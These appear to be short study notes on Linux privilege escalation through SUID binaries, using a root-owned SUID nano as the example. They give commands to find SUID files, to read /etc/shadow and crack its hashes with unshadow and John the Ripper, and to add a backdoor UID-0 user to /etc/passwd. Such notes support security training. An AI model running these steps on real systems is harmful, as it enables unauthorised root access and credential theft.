- SUID allows files to be executed with the permission level of the file owner. - Files with SUID have an `s` bit set showing their special permission level. - `find / -type f -perm -4000 2>/dev/null` lists files that have SUID bit set. - `gtfobins.github.io` has a SUID button that filters binaries known to be exploitable when the SUID bit is set. # Example: SUID set on `nano` - Let's say `nano` has SUID set owned by root. - if you run it, you're editing files as root, even if you're just a normal user. # Option 1: Read `/etc/shadow` and crack passwords ```bash # 1. Run /etc/shadow nano /etc/shadow # 2. Also copy /etc/passwd nano /etc/passwd # 3. Use unshadow tool unshadow passwd.txt shadow.txt > passwords.txt # 4. Use John the Ripper to try cracking the password john passwords.txt --wordlist=/path/to/wordlist ``` # Option 2: Add a new root user ```bash # 1. generate a password hash openssl passwd -1 yourpassword # 2. use nano to edit /etc/passwd and add a new line # This makes newuser have root privileges newuser:$1$hash...$:0:0:root:/root:/bin/bash # 3. switch to that user su newuser ```